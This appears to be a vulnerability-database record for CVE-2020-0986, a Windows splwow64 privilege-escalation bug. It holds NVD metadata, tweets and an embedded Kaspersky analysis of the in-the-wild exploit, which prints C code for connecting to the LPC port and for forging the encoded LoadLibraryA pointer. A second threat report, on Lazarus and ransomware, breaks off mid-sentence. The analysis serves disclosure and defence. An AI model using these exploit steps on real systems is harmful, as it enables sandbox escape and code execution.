ID CVE-2020-0986 Type cve Reporter cve@mitre.org Modified 2020-12-23T20:15:00
Description
An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.
{"id": "CVE-2020-0986", "bulletinFamily": "NVD", "title": "CVE-2020-0986", "description": "An elevation of privilege vulnerability exists when the Windows kernel fails to properly handle objects in memory, aka 'Windows Kernel Elevation of Privilege Vulnerability'. This CVE ID is unique from CVE-2020-1237, CVE-2020-1246, CVE-2020-1262, CVE-2020-1264, CVE-2020-1266, CVE-2020-1269, CVE-2020-1273, CVE-2020-1274, CVE-2020-1275, CVE-2020-1276, CVE-2020-1307, CVE-2020-1316.", "published": "2020-06-09T20:15:00", "modified": "2020-12-23T20:15:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-0986", "reporter": "cve@mitre.org", "references": ["https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0986", "http://packetstormsecurity.com/files/160698/Microsoft-Windows-splWOW64-Privilege-Escalation.html"], "cvelist": ["CVE-2020-0986"], "type": "cve", "lastseen": "2020-12-24T13:57:46", "edition": 5, "viewCount": 52, "enchantments": {"dependencies": {"references": [{"type": "securelist", "idList": ["SECURELIST:C65BBC029B301149C73E48F99596B4A0", "SECURELIST:03ACF8FB3AEA9D33D265642AD60AF9E9", "SECURELIST:6E5BCE8A736D28A7E168E1CD5131CE3D", "SECURELIST:E2805DD2729049C4BBE6F641B5ADA21C"]}, {"type": "attackerkb", "idList": ["AKB:0E829C08-804A-436D-A730-1B474A82E4A7"]}, {"type": "zdi", "idList": ["ZDI-20-663"]}, {"type": "mscve", "idList": ["MS:CVE-2020-0986"]}, {"type": "thn", "idList": ["THN:279CDD851D8F33C8B07217F8D20F6AAA"]}, {"type": "threatpost", "idList": ["THREATPOST:52B00377F0B400F0EFF0B3C4FF948F6F"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310817140", "OPENVAS:1361412562310817145", "OPENVAS:1361412562310817157", "OPENVAS:1361412562310817143", "OPENVAS:1361412562310817146", "OPENVAS:1361412562310817142", "OPENVAS:1361412562310817144", "OPENVAS:1361412562310817141", "OPENVAS:1361412562310817063"]}, {"type": "nessus", "idList": ["SMB_NT_MS20_JUN_4561649.NASL", 
"SMB_NT_MS20_JUN_4561616.NASL", "SMB_NT_MS20_JUN_4561608.NASL", "SMB_NT_MS20_JUN_4557957.NASL", "SMB_NT_MS20_JUN_4561621.NASL", "SMB_NT_MS20_JUN_4561612.NASL", "SMB_NT_MS20_JUN_4561602.NASL", "SMB_NT_MS20_JUN_4560960.NASL", "SMB_NT_MS20_JUN_4561666.NASL"]}, {"type": "kaspersky", "idList": ["KLA11807"]}, {"type": "avleonov", "idList": ["AVLEONOV:24538B1ED96269982136AA43998E5780"]}], "modified": "2020-12-24T13:57:46", "rev": 2}, "exploitation": {"wildExploited": true, "wildExploitedSources": [{"type": "attackerkb", "idList": ["AKB:0E829C08-804A-436D-A730-1B474A82E4A7"]}], "modified": "2020-12-24T13:57:46"}, "score": {"value": 5.5, "vector": "NONE", "modified": "2020-12-24T13:57:46", "rev": 2}, "twitter": {"counter": 38, "tweets": [{"link": "https://twitter.com/hackerfantastic/status/1342218312340676609", "text": "Looked into CVE-2020-0986 as unpatched privilege escalations in Windows are hot right now. Articles are a bit misleading, this only allows privilege escalation from low-integrity to medium integrity - useful for exploit chains but it's not SYSTEM privileges. Interesting bug tho."}, {"link": "https://twitter.com/DCWebGuy/status/1342283220151369728", "text": "The CVE-2020-0986 flaw concerns an elevation of privilege exploit in the GDI Print /\u00a0Print Spooler\u00a0API (\"splwow64.exe\") that was reported to Microsoft by an anonymous user working with Trend Micro's Zero Day Initiative (ZDI) back in late December 2019."}, {"link": "https://twitter.com/ROlejnikov/status/1342428136844230663", "text": "The local privilege-escalation bug in Windows 8.1 and Windows 10 (CVE-2020-0986) exists in the Print Spooler API. 
It could allow a local attacker to elevate privileges and execute code in the context of the current user."}, {"link": "https://twitter.com/TowardsCybersec/status/1342452133413617666", "text": "Originally tracked as CVE-2020-0986, the flaw concerns an elevation of privilege exploit in the GDI Print / Print Spooler API (\"splwow64.exe\") that was reported to Microsoft by an anonymous user back in late December 2019.\n\n/hashtag/cybersecurity?src=hashtag_click /hashtag/security?src=hashtag_click /hashtag/privacy?src=hashtag_click /hashtag/infosec?src=hashtag_click /hashtag/Windows?src=hashtag_click"}, {"link": "https://twitter.com/misaelban/status/1342579858472374275", "text": "/hashtag/Google?src=hashtag_click hackers disclose /hashtag/exploit?src=hashtag_click for an UNPATCHED /hashtag/Windows?src=hashtag_click /hashtag/vulnerability?src=hashtag_click /hashtag/CVE?src=hashtag_click-2020-0986 that was exploited as 0-day in the wild, for which /hashtag/Microsoft?src=hashtag_click issued an incomplete patch and then failed to patch it again under the 90-day deadline. 
https://t.co/VNaH1X9yuN?amp=1 /hashtag/CyberSecurity?src=hashtag_click"}, {"link": "https://twitter.com/f1tym1/status/1343584016742703106", "text": "Google: Microsoft Improperly Patched Exploited Windows Vulnerability\n\nGoogle Project Zero has disclosed a Windows zero-day vulnerability caused by the improper fix for CVE-2020-0986, a security flaw abused in a campaign dubbed Operation PowerFall.\n\nread \u2026 https://t.co/sfpq8wC9hf?amp=1"}, {"link": "https://twitter.com/IonutArghire/status/1343605796811264000", "text": "Google discloses Windows vulnerability caused by improper fix for CVE-2020-0986, a privilege escalation bug exploited in attacks https://t.co/cugDcwgd7c?amp=1"}, {"link": "https://twitter.com/WiFi_SEC_acc/status/1343959184686125062", "text": "Google Project Zero researcher Maddie Stone explains, in May, Kaspersky (/oct0xor) discovered CVE-2020-0986 in Windows splwow64 was exploited itw as a 0day. \nMS released a patch in June, but that patch didnt fix the vuln. After rep\u2026https://t.co/YGOu1YdJKe?amp=1 https://t.co/h94nflryDB?amp=1"}, {"link": "https://twitter.com/petermorin123/status/1343966191786844173", "text": "Google Project Zero has disclosed a Windows zero-day vulnerability caused by the improper fix for CVE-2020-0986, a security flaw abused in a campaign dubbed Operation PowerFall.\n\nhttps://t.co/JPRkNJDH1U?amp=1"}, {"link": "https://twitter.com/HermCardona/status/1346187152724471813", "text": "/hashtag/CVE?src=hashtag_click-2020-0986 concerns an elevation of privilege exploit in the GDI Print / Print Spooler API (\"splwow64.exe\") that was reported to Microsoft. 
/hashtag/cybersecurity?src=hashtag_click /hashtag/pentesting?src=hashtag_click /hashtag/redteam?src=hashtag_click"}], "modified": "2020-12-24T13:57:46"}, "vulnersScore": 5.5}, "cpe": ["cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_10:1803", "cpe:/o:microsoft:windows_server_2016:1803", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_rt_8.1:-", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_10:1903", "cpe:/o:microsoft:windows_10:1709", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_server_2016:1903"], "affectedSoftware": [{"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1809"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1607"}, {"cpeName": "microsoft:windows_rt_8.1", "name": "microsoft windows rt 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1903"}, {"cpeName": "microsoft:windows_server_2019", "name": "microsoft windows server 2019", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "r2"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_10", "name": 
"microsoft windows 10", "operator": "eq", "version": "1709"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "2004"}, {"cpeName": "microsoft:windows_server_2012", "name": "microsoft windows server 2012", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_8.1", "name": "microsoft windows 8.1", "operator": "eq", "version": "-"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1903"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1909"}, {"cpeName": "microsoft:windows_10", "name": "microsoft windows 10", "operator": "eq", "version": "1803"}, {"cpeName": "microsoft:windows_server_2016", "name": "microsoft windows server 2016", "operator": "eq", "version": "-"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", 
"cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"], "cwe": ["CWE-269"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1903:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1803:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": 
"cpe:2.3:o:microsoft:windows_10:1903:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_10:1709:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_rt_8.1:-:*:*:*:*:*:*:*", "vulnerable": true}, {"cpe23Uri": "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "vulnerable": true}], "operator": "OR"}]}}
{"securelist": [{"lastseen": "2020-09-02T16:17:54", "bulletinFamily": "blog", "cvelist": ["CVE-2019-0880", "CVE-2020-0986"], "description": "\n\nIn August 2020, we published a blog post about [Operation PowerFall](<https://securelist.com/ie-and-windows-zero-day-operation-powerfall/97976/>). This targeted attack consisted of two zero-day exploits: a remote code execution exploit for Internet Explorer 11 and an elevation of privilege exploit targeting the latest builds of Windows 10. While we already described the exploit for Internet Explorer in the original blog post, we also promised to share more details about the elevation of privilege exploit in a follow-up post. Let's take a look at vulnerability CVE-2020-0986, how it was exploited by attackers, how it was fixed and what additional mitigations were implemented to complicate exploitation of many other similar vulnerabilities.\n\n## CVE-2020-0986\n\nCVE-2020-0986 is an arbitrary pointer dereference vulnerability in [GDI Print](<https://docs.microsoft.com/en-us/windows/win32/printdocs/about-the-gdi-print-api>)/[Print Spooler](<https://docs.microsoft.com/en-us/windows/win32/printdocs/print-spooler-api>) API. By using this vulnerability it is possible to manipulate the memory of the splwow64.exe process to achieve execution of arbitrary code in the process and escape the Internet Explorer 11 sandbox because splwow64.exe is running with medium integrity level. "Print driver host for applications," as Microsoft describes splwow64.exe, is a relatively small binary that hosts 64-bit user-mode printer drivers and implements the Local Procedure Call (LPC) server that can be used by other processes to access printing functions. This allows the use of 64-bit printer drivers from 32-bit processes. 
Below I provide the code that can be used to spawn splwow64.exe and connect to splwow64.exe's LPC server.\n \n \n typedef struct _PORT_VIEW\n {\n \tUINT64 Length;\n \tHANDLE SectionHandle;\n \tUINT64 SectionOffset;\n \tUINT64 ViewSize;\n \tUCHAR* ViewBase;\n \tUCHAR* ViewRemoteBase;\n } PORT_VIEW, *PPORT_VIEW;\n \n PORT_VIEW ClientView;\n \n typedef struct _PORT_MESSAGE_HEADER {\n \tUSHORT DataSize;\n \tUSHORT MessageSize;\n \tUSHORT MessageType;\n \tUSHORT VirtualRangesOffset;\n \tCLIENT_ID ClientId;\n \tUINT64 MessageId;\n \tUINT64 SectionSize;\n } PORT_MESSAGE_HEADER, *PPORT_MESSAGE_HEADER;\n \n typedef struct _PROXY_MSG {\n \tPORT_MESSAGE_HEADER MessageHeader;\n \tUINT64 InputBufSize;\n \tUINT64 InputBuf;\n \tUINT64 OutputBufSize;\n \tUINT64 OutputBuf;\n \tUCHAR Padding[0x1F8];\n } PROXY_MSG, *PPORT_MESSAGE;\n \n PROXY_MSG LpcReply;\n PROXY_MSG LpcRequest;\n \n int GetPortName(PUNICODE_STRING DestinationString)\n {\n \tvoid *tokenHandle;\n \tDWORD sessionId;\n \tULONG length;\n \n \tint tokenInformation[16];\n \tWCHAR dst[256];\n \n \tmemset(tokenInformation, 0, sizeof(tokenInformation));\n \tProcessIdToSessionId(GetCurrentProcessId(), &sessionId);\n \n \tmemset(dst, 0, sizeof(dst));\n \n \tif (NtOpenProcessToken(GetCurrentProcess(), READ_CONTROL | TOKEN_QUERY, &tokenHandle)\n \t\t|| ZwQueryInformationToken(tokenHandle, TokenStatistics, tokenInformation, sizeof(tokenInformation), &length))\n \t{\n \t\treturn 0;\n \t}\n \n \twsprintfW(\n \t\tdst,\n \t\tL\"\\\\RPC Control\\\\UmpdProxy_%x_%x_%x_%x\",\n \t\tsessionId,\n \t\ttokenInformation[2],\n \t\ttokenInformation[3],\n \t\t0x2000);\n \tRtlInitUnicodeString(DestinationString, dst);\n \n \treturn 1;\n }\n \n HANDLE CreatePortSharedBuffer(PUNICODE_STRING PortName)\n {\n \tHANDLE sectionHandle = 0;\n \tHANDLE portHandle = 0;\n \tunion _LARGE_INTEGER maximumSize;\n \tmaximumSize.QuadPart = 0x20000;\n \n \tNtCreateSection(&sectionHandle, SECTION_MAP_WRITE | SECTION_MAP_READ, 0, &maximumSize, PAGE_READWRITE, SEC_COMMIT, 
NULL);\n \tif (sectionHandle)\n \t{\n \t\tClientView.SectionHandle = sectionHandle;\n \t\tClientView.Length = 0x30;\n \t\tClientView.ViewSize = 0x9000;\n \t\tZwSecureConnectPort(&portHandle, PortName, NULL, &ClientView, NULL, NULL, NULL, NULL, NULL);\n \t}\n \n \treturn portHandle;\n }\n \n int main()\n {\n \tprintf(\"Spawn splwow64.exe\\n\");\n \tCHAR Path[0x100];\n \tGetCurrentDirectoryA(sizeof(Path), Path);\n \tPathAppendA(Path, \"CreateDC.exe\"); // x86 application with call to CreateDC\n \tWinExec(Path, 0);\n \tSleep(1000);\n \n \tCreateDCW(L\"Microsoft XPS Document Writer\", L\"Microsoft XPS Document Writer\", NULL, NULL);\n \n \tprintf(\"Get port name\\n\");\n \tUNICODE_STRING portName;\n \tif (!GetPortName(&portName))\n \t{\n \t\tprintf(\"Failed to get port name\\n\");\n \t\treturn 0;\n \t}\n \n \tprintf(\"Create port\\n\");\n \tHANDLE portHandle = CreatePortSharedBuffer(&portName);\n \tif (!(portHandle && ClientView.ViewBase && ClientView.ViewRemoteBase))\n \t{\n \t\tprintf(\"Failed to create port\\n\");\n \t\treturn 0;\n \t}\n }\n\nTo send data to the LPC server it's enough to prepare the printer command in the shared memory region and send an LPC message with NtRequestWaitReplyPort().\n \n \n memset(&LpcRequest, 0, sizeof(LpcRequest));\n LpcRequest.MessageHeader.DataSize = 0x20;\n LpcRequest.MessageHeader.MessageSize = 0x48;\n \n LpcRequest.InputBufSize = 0x88;\n LpcRequest.InputBuf = (UINT64)ClientView.ViewRemoteBase; // Points to printer command\n LpcRequest.OutputBufSize = 0x10;\n LpcRequest.OutputBuf = (UINT64)ClientView.ViewRemoteBase + LpcRequest.InputBufSize;\n \n // TODO: Prepare printer command\n \n NtRequestWaitReplyPort(portHandle, &LpcRequest, &LpcReply);\n\nWhen the LPC message is received, it is processed by the function TLPCMgr::ProcessRequest(PROXY_MSG *). This function takes _LpcRequest_ as a parameter and verifies it. After that it allocates a buffer for the printer command and copies it there from shared memory. 
The printer command function INDEX, which is used to identify different driver functions, is stored as a double word at offset 4 in the printer command structure. An almost complete list of different function INDEX values can be found in the header file _winddi.h_. This header file includes different INDEX values from INDEX_DrvEnablePDEV (0) up to INDEX_LAST (103), but the full list of INDEX values does not end there. Analysis of gdi32full.dll reveals that there are a number of special INDEX values and some of them are provided in the table below (to find them in binary, look for calls to PROXYPORT::SendRequest).\n \n \n 106 \u2013 INDEX_LoadDriver\n 107 \u2013 INDEX_UnloadDriver\n 109 \u2013 INDEX_DocumentEvent\n 110 \u2013 INDEX_StartDocPrinterW\n 111 \u2013 INDEX_StartPagePrinter\n 112 \u2013 INDEX_EndPagePrinter\n 113 \u2013 INDEX_EndDocPrinter\n 114 \u2013 INDEX_AbortPrinter\n 115 \u2013 INDEX_ResetPrinterW\n 116 \u2013 INDEX_QueryColorProfile\n\nFunction TLPCMgr::ProcessRequest(PROXY_MSG *) checks the function INDEX value and if it passes the checks, the printer command will be processed by function GdiPrinterThunk in gdi32full.dll.\n \n \n if ( IsKernelMsg || INDEX >= 106 && (INDEX <= 107 || INDEX - 109 <= 7))\n {\n // \u2026\n GdiPrinterThunk(LpcRequestInputBuf, LpcRequestOutputBuf, LpcRequestOutputBufSize);\n }\n\nGdiPrinterThunk itself is a very large function that processes more than 60 different function INDEX values, and the handler for one of them \u2013 namely INDEX_DocumentEvent \u2013 contains vulnerability CVE-2020-0986. The handler for INDEX_DocumentEvent will use information provided in the printer command (fully controllable from the LPC client) to check that the command is intended for a printer with a valid handle. 
After the check it will use the function DecodePointer to decode the pointer of the function stored at the _fpDocumentEvent_ global variable (located in .data segment), then use the decoded pointer to execute the function, and finally perform a call to memcpy() where source, destination and size arguments are obtained from the printer command and are fully controllable by the attacker.\n\n## Exploitation\n\nIn Windows OS the base addresses of system DLL libraries are randomized with each boot, aiding exploitation of this vulnerability. The exploit loads the libraries gdi32full.dll and winspool.drv, and then obtains the offset of the _fpDocumentEvent_ pointer from gdi32full.dll and the address of the DocumentEvent function from winspool.drv. After that the exploit performs a number of LPC requests with specially crafted INDEX_DocumentEvent commands to leak the value of the _fpDocumentEvent_ pointer. The value of the raw pointer is protected using [EncodePointer](<https://docs.microsoft.com/en-us/previous-versions/bb432254\\(v=vs.85\\)>) protection, but the function pointed to by this raw pointer is executed each time the INDEX_DocumentEvent command is sent and the arguments of this function are fully controllable. All this makes the _fpDocumentEvent_ pointer the best candidate for an overwrite. A necessary step for exploitation is to encode our own pointer in such a manner that it will be properly decoded by the function DecodePointer. Since we have the value of the encoded pointer and the value of the decoded pointer (address of the DocumentEvent function from winspool.drv), we are able to calculate the secret constant used for pointer encoding and then use it to encode our own pointer. 
The necessary calculations are provided below.\n \n \n // Calculate secret for pointer encoding\n while (1)\n {\n \tsecret = (unsigned int)DocumentEvent ^ __ROL8__(*(UINT64*)leaked_fpDocumentEvent, i & 0x3F);\n \tif ((secret & 0x3F) == i && __ROR8__((UINT64)DocumentEvent ^ secret, secret & 0x3F) == *(UINT64*)leaked_fpDocumentEvent)\n \t\tbreak;\n \tif (++i > 0x3F)\n \t{\n \t\tsecret = 0;\n \t\tbreak;\n \t}\n }\n \n // Encode LoadLibraryA pointer with calculated secret\n UINT64 encodedPtr = __ROR8__(secret ^ (UINT64)LoadLibraryA, secret & 0x3F);\n\nAt this stage, in order to achieve code execution from the splwow64.exe process, it's sufficient to overwrite the _fpDocumentEvent_ pointer with the encoded pointer of function LoadLibraryA and provide the name of a library to load in the next LPC request with the INDEX_DocumentEvent command.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/08/31152055/sl_operation_powerfall_01.png>)\n\n**_Overview of attack_**\n\n## CVE-2019-0880\n\nAnalysis of CVE-2020-0986 reveals that this vulnerability is the twin brother of the previously discovered CVE-2019-0880. The write-up for CVE-2019-0880 is available [here](<https://byteraptors.github.io/windows/exploitation/2020/05/24/sandboxescape.html>). It's another vulnerability that was exploited as an in-the-wild zero-day. CVE-2019-0880 is just another fully controllable call to memcpy() in the same GdiPrinterThunk function, just a few lines of code away in a handler of function INDEX 118. It seems hard to believe that the developers didn't notice the existence of a variant for this vulnerability, so why was CVE-2020-0986 not patched back then and why did it take so long to fix it? It may not be obvious on first glance, but GdiPrinterThunk is totally broken. 
Even fixing a couple of calls to memcpy doesn't really help.\n\n## Arbitrary pointer dereference host for applications\n\nThe problem lies in the fact that almost every function INDEX in GdiPrinterThunk is susceptible to a potential arbitrary pointer dereference vulnerability. Let's take a look again at the format of the LPC request message.\n \n \n typedef struct _PROXY_MSG {\n \tPORT_MESSAGE_HEADER MessageHeader;\n \tUINT64 InputBufSize;\n \tUINT64 InputBuf;\n \tUINT64 OutputBufSize;\n \tUINT64 OutputBuf;\n \tUCHAR Padding[0x1F8];\n } PROXY_MSG, *PPORT_MESSAGE;\n\n_InputBuf_ and _OutputBuf_ are both pointers that should point to a shared memory region. _InputBuf_ points to a location where the printer command is prepared, and when this command is processed by GdiPrinterThunk the result might be written back to the LPC client using the pointer that was provided as _OutputBuf_. Many handlers for different INDEX values provide data to the LPC client, but the problem is that the pointers _InputBuf_ and _OutputBuf_ are fully controllable from the LPC client and manipulation of the _OutputBuf_ pointer can lead to an overwrite of splwow64.exe's process memory.\n\n## How it was mitigated\n\nMicrosoft fixed CVE-2020-0986, but also implemented a mitigation aimed to make exploitation of _OutputBuf_ vulnerabilities as hard as possible. Before the patch the function FindPrinterHandle() blindly trusted the data provided through the printer command in an LPC request and it was easy to bypass a valid handle check. After the patch the format of the printer command was changed so it no longer contains the address of the handle table, but instead contains a valid driver ID (quad word at offset 0x18). Now the linked list of handle tables is stored inside the splwow64.exe process and the new function FindDriverForCookie() uses the provided driver ID to get a handle table securely. 
For a printer command to be processed it should contain a valid printer handle (quad word at offset 0x20). The printer handle consists of process ID and the address of the buffer allocated for the printer driver. It is possible to guess some bytes of the printer handle, but a successful real-world brute-force attack on this implementation seems to be unlikely. So, it's safe to assume that this bug class was properly mitigated. However, there are still a couple of places in the code where it is possible to write a 0 for the address provided as _OutputBuf_ without a handle check, but exploitation in such a scenario doesn't appear to be feasible.", "modified": "2020-09-02T10:00:56", "published": "2020-09-02T10:00:56", "id": "SECURELIST:C65BBC029B301149C73E48F99596B4A0", "href": "https://securelist.com/operation-powerfall-cve-2020-0986-and-variants/98329/", "type": "securelist", "title": "Operation PowerFall: CVE-2020-0986 and variants", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-24T16:20:40", "bulletinFamily": "blog", "cvelist": ["CVE-2020-0986", "CVE-2020-1380"], "description": "\n\n## Targeted attacks\n\n### MATA: Lazarus's multi-platform targeted malware framework\n\nThe more sophisticated threat actors are continually developing their TTPs (Tactics, Techniques and Procedures) and the toolsets they use to compromise the systems of their targets. However, malicious toolsets used to target multiple platforms are rare, because they require significant investment to develop and maintain. In July, we reported the use of an advanced, multi-purpose malware framework developed by the Lazarus group.\n\nWe discovered the first artefacts relating to this framework, dubbed 'MATA' (the authors named their infrastructure 'MataNet'), in April 2018. 
Since then, Lazarus has further developed MATA; and there are now versions for Windows, Linux and macOS operating systems.\n\nThe MATA framework consists of several components, including a loader, an orchestrator (which manages and coordinates the processes once a device is infected), a C&C server and various plugins.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08145951/sl_mata_01.png>)\n\nLazarus has used MATA to infiltrate the networks of organizations around the world and steal data from customer databases; and, in at least one case, the group has used it to spread ransomware \u2013 you can read more about this in the next section. The victims have included software developers, Internet providers and e-commerce sites; and we detected traces of the group's activities in Poland, Germany, Turkey, Korea, Japan, and India.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08150538/sl_mata_04.png>)\n\nYou can read more about MATA [here](<https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/>).\n\n### Lazarus on the hunt for big game\n\nTargeted ransomware has been on the increase in recent years. Typically, such attacks are carried out by criminal groups, who license 'as-a-service' ransomware from third-party malware developers and then distribute it by piggy-backing established botnets.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08160419/sl_lazarus_01.png>)\n\nHowever, earlier this year we discovered a new ransomware family linked to the Lazarus APT group. The [VHD ransomware](<https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/>) operates much like other ransomware \u2013 it encrypts files on drives connected to the victim's computer and deletes System Volume Information (used as part of the Windows restore point feature) to prevent recovery of data. 
The malware also suspends processes that could potentially lock important files, such as Microsoft Exchange or SQL Server. However, the delivery mechanism is more reminiscent of APT campaigns. The spreading utility contains a list of administrative credentials and IP addresses specific to the victim, which it uses to brute-force the SMB service on every discovered computer. Whenever it makes a successful connection, a network share is mounted and the VHD ransomware is copied and executed through WMI calls.\n\nWhile investigating a second incident, we were able to uncover the full infection chain. The malware gained access to a victim's system by exploiting a vulnerable VPN gateway and then obtained administrative rights on the compromised machines. It used these to install a backdoor and take control of the Active Directory server. Then all computers were infected with the VHD ransomware using a loader created specifically for this task.\n\nFurther analysis revealed the backdoor to be part of the MATA framework described above.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/07/08160730/sl_lazarus_03.png>)\n\n### WastedLocker\n\n[Garmin, the GPS and aviation specialist, was the victim of a cyber-attack](<https://www.garmin.com/en-US/outage/>) in July that resulted in the encryption of some of its systems. The malware used in the attack was WastedLocker, and you can read our technical analysis of this ransomware [here](<https://securelist.com/wastedlocker-technical-analysis/97944/>).\n\nThis ransomware, the use of which has increased this year, has several noteworthy features. It includes a command line interface that attackers can use to control the way it operates \u2013 specifying directories to target and setting a priority of which files to encrypt first; and controlling the encryption 